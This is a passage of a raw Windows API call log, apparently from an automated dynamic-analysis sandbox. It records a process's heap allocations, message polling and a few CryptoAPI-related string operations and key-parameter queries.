Size=0x10) returned 0x9bd360 [0190.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0190.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0190.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0190.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0190.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0190.356] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0190.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0190.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0190.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0190.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0190.356] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0190.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0190.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0190.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0190.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0190.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0190.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0190.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0190.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0190.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0190.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0190.356] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0190.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0190.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0190.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0190.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27b8 [0190.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0190.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0190.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0190.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0190.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba420 [0190.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0190.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0190.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0190.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0190.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0190.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0190.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0190.357] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0190.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0190.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0190.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0190.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0190.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0190.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0190.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0190.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0190.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0190.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0190.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0190.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0190.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0190.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0190.357] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0190.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0190.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0190.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0190.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0190.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0190.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0190.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0190.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0190.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0190.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0190.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0190.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0190.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0190.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0190.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0190.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0190.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0190.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0190.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0190.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0190.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0190.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0190.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0190.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0190.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0190.358] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0190.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0190.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0190.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0190.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0190.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0190.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0190.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0190.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0190.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0190.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0190.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0190.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0190.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0190.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0190.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0190.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0190.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0190.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0190.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0190.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0190.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0190.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0190.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0190.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0190.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0190.360] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0190.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0190.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0190.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0190.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0190.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0190.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0190.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0190.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0190.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0190.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0190.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0190.361] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0190.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba018 [0190.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0190.361] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0190.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0190.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0190.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0190.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0190.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0190.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0190.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0190.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0190.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0190.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0190.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0190.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0190.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0190.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0190.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0190.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0190.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0190.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0190.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0190.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0190.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0190.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0190.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0190.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0190.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0190.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0190.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0190.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0190.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0190.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0190.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0190.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0190.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0190.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0190.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0190.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0190.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0190.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0190.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0190.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0190.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0190.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0190.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0190.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0190.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0190.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0190.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0190.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0190.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0190.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0190.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0190.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0190.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0190.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0190.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0190.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0190.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0190.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0190.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0190.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0190.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0190.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0190.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0190.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0190.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0190.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0190.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0190.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0190.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0190.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0190.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0190.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0190.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0190.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0190.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0190.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0190.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0190.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0190.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0190.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0190.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0190.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0190.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0190.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0190.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0190.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0190.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0190.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0190.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0190.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0190.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0190.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0190.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0190.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0190.365] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0190.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0190.365] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c26c8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c26c8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0190.365] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.365] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.365] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.365] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.365] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.365] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0190.366] PeekMessageW (in: lpMsg=0x87ee3c, 